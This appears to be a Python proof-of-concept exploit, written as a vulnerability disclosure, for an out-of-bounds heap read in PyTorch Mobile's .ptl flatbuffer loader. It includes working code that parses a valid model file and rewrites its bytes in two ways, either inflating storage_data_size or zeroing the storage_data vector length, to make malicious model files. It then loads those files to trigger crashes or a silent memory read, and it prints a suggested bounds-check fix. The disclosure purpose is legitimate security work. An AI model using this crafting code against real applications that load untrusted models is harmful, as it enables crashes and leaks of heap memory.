| |
| """ |
| PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl) |
| |
| Vulnerability: The flatbuffer loader's getStorage() method at |
| flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and |
| `index < storages_.size()`, but both vectors are sized from |
| `module->storage_data_size()` β an integer field in the flatbuffer schema |
| that is INDEPENDENT of the actual `storage_data()` vector. |
| |
| A crafted .ptl file can set `storage_data_size` larger than the actual |
| `storage_data` vector length, then reference storage indices that pass the |
| bounds check but are OOB on the real vector. GetMutableObject(index) on the |
| flatbuffer vector reads past its bounds, interpreting random flatbuffer data |
| as a StorageData table β heap OOB read, crash, or information disclosure. |
| |
| Root cause: |
| - flatbuffer_loader.cpp:306-307 β storages_ sized from storage_data_size (int field) |
| - flatbuffer_loader.cpp:697-698 β bounds check against storages_.size() |
| - flatbuffer_loader.cpp:700 β actual access on storage_data() (the real vector) |
| - NO check that storage_data_size <= storage_data()->size() |
| |
| Tested: PyTorch 2.10.0+cpu on Python 3.13.11 |
| """ |
|
|
| import io |
| import os |
| import struct |
| import subprocess |
| import sys |
| import tempfile |
| import warnings |
|
|
| import torch |
| import torch.nn as nn |
|
|
| warnings.filterwarnings('ignore') |
|
|
|
|
| def create_valid_flatbuffer_ptl(output_path): |
| """Create a valid .ptl flatbuffer model using PyTorch's serializer.""" |
| model = torch.jit.script(nn.Linear(4, 2)) |
| model._save_for_lite_interpreter(output_path, _use_flatbuffer=True) |
| return output_path |
|
|
|
|
| def analyze_flatbuffer(data): |
| """Parse flatbuffer structure and return key offsets.""" |
| info = {} |
|
|
| |
| root_offset = struct.unpack_from('<I', data, 0)[0] |
| info['root_table_pos'] = root_offset |
|
|
| |
| vtable_soffset = struct.unpack_from('<i', data, root_offset)[0] |
| vtable_pos = root_offset - vtable_soffset |
| info['vtable_pos'] = vtable_pos |
|
|
| |
| sds_field_off = struct.unpack_from('<H', data, vtable_pos + 14)[0] |
| if sds_field_off: |
| info['storage_data_size_pos'] = root_offset + sds_field_off |
| info['storage_data_size_val'] = struct.unpack_from( |
| '<i', data, info['storage_data_size_pos'] |
| )[0] |
|
|
| |
| sd_field_off = struct.unpack_from('<H', data, vtable_pos + 16)[0] |
| if sd_field_off: |
| sd_offset_pos = root_offset + sd_field_off |
| sd_rel = struct.unpack_from('<I', data, sd_offset_pos)[0] |
| sd_vec_pos = sd_offset_pos + sd_rel |
| sd_vec_len = struct.unpack_from('<I', data, sd_vec_pos)[0] |
| info['storage_data_vec_pos'] = sd_vec_pos |
| info['storage_data_vec_len'] = sd_vec_len |
|
|
| |
| ivalues_field_off = struct.unpack_from('<H', data, vtable_pos + 12)[0] |
| if ivalues_field_off: |
| iv_offset_pos = root_offset + ivalues_field_off |
| iv_rel = struct.unpack_from('<I', data, iv_offset_pos)[0] |
| iv_vec_pos = iv_offset_pos + iv_rel |
| iv_count = struct.unpack_from('<I', data, iv_vec_pos)[0] |
| info['ivalues_count'] = iv_count |
| info['tensor_metadata'] = [] |
|
|
| for i in range(iv_count): |
| offset_pos = iv_vec_pos + 4 + i * 4 |
| rel = struct.unpack_from('<I', data, offset_pos)[0] |
| ival_pos = offset_pos + rel |
|
|
| |
| iv_vt_soff = struct.unpack_from('<i', data, ival_pos)[0] |
| iv_vt = ival_pos - iv_vt_soff |
| iv_vt_size = struct.unpack_from('<H', data, iv_vt)[0] |
| iv_num_fields = (iv_vt_size - 4) // 2 |
|
|
| |
| val_type = None |
| if iv_num_fields >= 1: |
| ft_off = struct.unpack_from('<H', data, iv_vt + 4)[0] |
| if ft_off: |
| val_type = data[ival_pos + ft_off] |
|
|
| |
| if val_type == 5: |
| |
| fv_off = struct.unpack_from('<H', data, iv_vt + 6)[0] |
| if fv_off: |
| val_rel = struct.unpack_from('<I', data, ival_pos + fv_off)[0] |
| tm_pos = ival_pos + fv_off + val_rel |
|
|
| |
| tm_vt_soff = struct.unpack_from('<i', data, tm_pos)[0] |
| tm_vt = tm_pos - tm_vt_soff |
| tm_vt_size = struct.unpack_from('<H', data, tm_vt)[0] |
| tm_num_fields = (tm_vt_size - 4) // 2 |
|
|
| |
| sli_val = 0 |
| sli_pos = None |
| if tm_num_fields >= 1: |
| sli_off = struct.unpack_from('<H', data, tm_vt + 4)[0] |
| if sli_off: |
| sli_pos = tm_pos + sli_off |
| sli_val = struct.unpack_from( |
| '<I', data, sli_pos |
| )[0] |
|
|
| info['tensor_metadata'].append({ |
| 'ivalue_index': i, |
| 'tm_pos': tm_pos, |
| 'storage_location_index': sli_val, |
| 'sli_byte_pos': sli_pos, |
| }) |
|
|
| return info |
|
|
|
|
| def create_malicious_ptl(input_path, output_path, oob_index=5): |
| """Modify a valid .ptl flatbuffer to trigger storage vector OOB read. |
| |
| Strategy: |
| 1. Inflate storage_data_size to be larger than actual storage_data vector |
| 2. Modify a tensor's storage_location_index to reference an OOB index |
| 3. The loader's getStorage() passes bounds check but OOB on real vector |
| """ |
| with open(input_path, 'rb') as f: |
| data = bytearray(f.read()) |
|
|
| info = analyze_flatbuffer(data) |
|
|
| orig_sds = info['storage_data_size_val'] |
| orig_vec_len = info['storage_data_vec_len'] |
| tensors = info['tensor_metadata'] |
|
|
| print(f" Original storage_data_size: {orig_sds}") |
| print(f" Actual storage_data vector length: {orig_vec_len}") |
| print(f" TensorMetadata entries: {len(tensors)}") |
| for tm in tensors: |
| print(f" ivalue[{tm['ivalue_index']}]: " |
| f"storage_location_index={tm['storage_location_index']}" |
| f" (byte {tm['sli_byte_pos']})") |
| print() |
|
|
| |
| new_sds = oob_index + 5 |
| sds_pos = info['storage_data_size_pos'] |
| struct.pack_into('<i', data, sds_pos, new_sds) |
| print(f" [*] Changed storage_data_size: {orig_sds} β {new_sds} " |
| f"(at byte {sds_pos})") |
|
|
| |
| |
| target_tm = None |
| for tm in tensors: |
| if tm['sli_byte_pos'] is not None: |
| target_tm = tm |
| break |
|
|
| if target_tm is None: |
| |
| |
| |
| print(" [*] No explicit storage_location_index found.") |
| print(" [*] Alternative: reduce storage_data vector length to 0") |
| print(f" storage_data vector at byte {info['storage_data_vec_pos']}") |
| |
| vec_pos = info['storage_data_vec_pos'] |
| struct.pack_into('<I', data, vec_pos, 0) |
| |
| struct.pack_into('<i', data, sds_pos, orig_sds) |
| print(f" [*] Set storage_data vector length: {orig_vec_len} β 0") |
| print(f" [*] storage_data_size remains {orig_sds}") |
| print() |
| print(f" Result: getStorage(0) passes bounds check (0 < {orig_sds})") |
| print(f" but storage_data()->GetMutableObject(0) is OOB " |
| f"(vector length = 0)") |
| else: |
| orig_sli = target_tm['storage_location_index'] |
| sli_pos = target_tm['sli_byte_pos'] |
| struct.pack_into('<I', data, sli_pos, oob_index) |
| print(f" [*] Changed ivalue[{target_tm['ivalue_index']}] " |
| f"storage_location_index: {orig_sli} β {oob_index} " |
| f"(at byte {sli_pos})") |
| print() |
| print(f" Result: getStorage({oob_index}) passes bounds check " |
| f"({oob_index} < {new_sds})") |
| print(f" but storage_data()->GetMutableObject({oob_index}) is OOB " |
| f"(vector length = {orig_vec_len})") |
|
|
| with open(output_path, 'wb') as f: |
| f.write(data) |
|
|
| print(f"\n Saved: {output_path} ({len(data)} bytes)") |
| return output_path |
|
|
|
|
| def demonstrate_vulnerability(): |
| """Show the vulnerability: mismatch between storage_data_size and |
| actual storage_data vector causes OOB in getStorage().""" |
| print() |
| print("=" * 70) |
| print(" Part 1: Vulnerability Demonstration") |
| print("=" * 70) |
| print() |
|
|
| |
| tmpdir = tempfile.mkdtemp(prefix="ptl_") |
| valid_path = os.path.join(tmpdir, "valid.ptl") |
| create_valid_flatbuffer_ptl(valid_path) |
|
|
| |
| print(" Step 1: Verify valid .ptl loads correctly") |
| try: |
| m = torch.jit.load(valid_path) |
| print(f" [+] Valid model loaded: {type(m)}") |
| del m |
| except Exception as e: |
| print(f" [-] Valid model failed: {e}") |
| return False |
|
|
| print() |
| print(" Step 2: Create malicious .ptl with inflated storage_data_size") |
| print() |
|
|
| malicious_path = os.path.join(tmpdir, "malicious.ptl") |
| create_malicious_ptl(valid_path, malicious_path, oob_index=5) |
|
|
| print() |
| print(" Step 3: Load malicious .ptl β OOB read in getStorage()") |
| print() |
|
|
| |
| poc_script = f''' |
| import torch, sys, warnings, signal |
| warnings.filterwarnings('ignore') |
| signal.alarm(5) |
| try: |
| m = torch.jit.load("{malicious_path}") |
| print("MODEL_LOADED") |
| # Try accessing the model |
| try: |
| result = m.forward(torch.randn(1, 4)) |
| print(f"FORWARD_OK: {{result}}") |
| except Exception as e: |
| print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}") |
| except RuntimeError as e: |
| err = str(e) |
| if "storage" in err.lower() or "corrupt" in err.lower() or "invalid" in err.lower(): |
| print(f"RUNTIME_ERROR: {{err[:200]}}") |
| else: |
| print(f"RUNTIME_ERROR: {{err[:200]}}") |
| except Exception as e: |
| print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}") |
| ''' |
| result = subprocess.run( |
| [sys.executable, '-c', poc_script], |
| capture_output=True, text=True, timeout=10 |
| ) |
|
|
| stdout = result.stdout.strip() |
| stderr = result.stderr.strip() |
| retcode = result.returncode |
|
|
| print(f" Return code: {retcode}") |
| if stdout: |
| print(f" Stdout: {stdout[:300]}") |
| if stderr: |
| for line in stderr.strip().split('\n')[:5]: |
| print(f" Stderr: {line[:200]}") |
|
|
| if retcode < 0: |
| signum = -retcode |
| try: |
| import signal as sig |
| signame = sig.Signals(signum).name |
| except (ValueError, AttributeError): |
| signame = f"signal {signum}" |
| print(f"\n [+] CRASH: Process killed by {signame} (signal {signum})") |
| print(f" [+] OOB read in storage_data vector caused {signame}") |
| return True |
| elif "RUNTIME_ERROR" in stdout: |
| print(f"\n [+] RuntimeError from corrupted flatbuffer data") |
| return True |
| elif "MODEL_LOADED" in stdout: |
| print(f"\n [!] Model loaded (OOB read happened silently)") |
| return True |
| else: |
| print(f"\n [-] Unexpected result") |
| return False |
|
|
|
|
| def demonstrate_alternative_attack(): |
| """Alternative: shrink storage_data vector length instead.""" |
| print() |
| print("=" * 70) |
| print(" Part 2: Alternative β Shrink storage_data vector length") |
| print("=" * 70) |
| print() |
|
|
| tmpdir = tempfile.mkdtemp(prefix="ptl2_") |
| valid_path = os.path.join(tmpdir, "valid.ptl") |
| create_valid_flatbuffer_ptl(valid_path) |
|
|
| with open(valid_path, 'rb') as f: |
| data = bytearray(f.read()) |
|
|
| info = analyze_flatbuffer(data) |
| vec_pos = info['storage_data_vec_pos'] |
| orig_len = info['storage_data_vec_len'] |
| sds = info['storage_data_size_val'] |
|
|
| print(f" storage_data_size (int field): {sds}") |
| print(f" storage_data vector length: {orig_len}") |
| print(f" storage_data vector at byte: {vec_pos}") |
| print() |
|
|
| |
| struct.pack_into('<I', data, vec_pos, 0) |
| print(f" [*] Set storage_data vector length: {orig_len} β 0") |
| print(f" [*] storage_data_size remains: {sds}") |
| print() |
| print(f" getStorage(0): passes bounds check (0 < {sds})") |
| print(f" storage_data()->GetMutableObject(0): OOB! vector length = 0") |
| print() |
|
|
| malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl") |
| with open(malicious_path, 'wb') as f: |
| f.write(data) |
|
|
| print(f" Saved: {malicious_path}") |
| print() |
|
|
| |
| poc_script = f''' |
| import torch, sys, warnings, signal |
| warnings.filterwarnings('ignore') |
| signal.alarm(5) |
| try: |
| m = torch.jit.load("{malicious_path}") |
| print("MODEL_LOADED") |
| except RuntimeError as e: |
| print(f"RUNTIME_ERROR: {{str(e)[:200]}}") |
| except Exception as e: |
| print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}") |
| ''' |
| result = subprocess.run( |
| [sys.executable, '-c', poc_script], |
| capture_output=True, text=True, timeout=10 |
| ) |
|
|
| stdout = result.stdout.strip() |
| stderr = result.stderr.strip() |
| retcode = result.returncode |
|
|
| print(f" Return code: {retcode}") |
| if stdout: |
| print(f" Stdout: {stdout[:300]}") |
| if stderr: |
| for line in stderr.strip().split('\n')[:5]: |
| print(f" Stderr: {line[:200]}") |
|
|
| if retcode < 0: |
| signum = -retcode |
| try: |
| import signal as sig |
| signame = sig.Signals(signum).name |
| except (ValueError, AttributeError): |
| signame = f"signal {signum}" |
| print(f"\n [+] CRASH: Process killed by {signame}") |
| return True |
| elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout: |
| print(f"\n [+] Error from corrupted flatbuffer data") |
| return True |
| else: |
| return False |
|
|
|
|
| def demonstrate_vulnerability_details(): |
| """Show the vulnerable code pattern.""" |
| print() |
| print("=" * 70) |
| print(" Part 3: Vulnerability Details") |
| print("=" * 70) |
| print() |
|
|
| print(" The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):") |
| print() |
| print(" table Module {") |
| print(" storage_data_size:int; // integer field (line 205)") |
| print(" storage_data:[StorageData]; // actual vector (line 206)") |
| print(" }") |
| print() |
| print(" In parseModule() (flatbuffer_loader.cpp:306-307):") |
| print(" storages_.resize(module->storage_data_size()); // uses INT field") |
| print(" storage_loaded_.resize(module->storage_data_size(), false);") |
| print() |
| print(" In getStorage() (flatbuffer_loader.cpp:696-700):") |
| print(" TORCH_CHECK(index < storage_loaded_.size()); // checks INT field") |
| print(" TORCH_CHECK(index < storages_.size()); // checks INT field") |
| print(" if (!storage_loaded_[index]) {") |
| print(" auto* storage = module_->storage_data() // accesses REAL vector!") |
| print(" ->GetMutableObject(index); // OOB!") |
| print() |
| print(" The loader NEVER validates:") |
| print(" storage_data_size <= storage_data()->size()") |
| print() |
| print(" FIX: Add validation in parseModule():") |
| print(" βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ") |
| print(" TORCH_CHECK(") |
| print(" module->storage_data() &&") |
| print(" module->storage_data_size() <=") |
| print(" static_cast<int>(module->storage_data()->size()),") |
| print(' "storage_data_size exceeds actual storage_data vector");') |
| print() |
|
|
|
|
| def main(): |
| print() |
| print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)") |
| print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}") |
| print() |
|
|
| ok1 = demonstrate_vulnerability() |
| ok2 = demonstrate_alternative_attack() |
| demonstrate_vulnerability_details() |
|
|
| |
| print("=" * 70) |
| print(" RESULTS:") |
| if ok1: |
| print(" [+] Inflated storage_data_size: OOB on storage_data vector") |
| if ok2: |
| print(" [+] Shrunk storage_data vector: OOB on GetMutableObject()") |
| print(" [+] Root cause: no validation that storage_data_size <=") |
| print(" storage_data()->size() in flatbuffer_loader.cpp") |
| print(" [+] Affects: PyTorch Mobile (.ptl flatbuffer format)") |
| print(" [+] Fix: validate storage_data_size against actual vector length") |
| print("=" * 70) |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|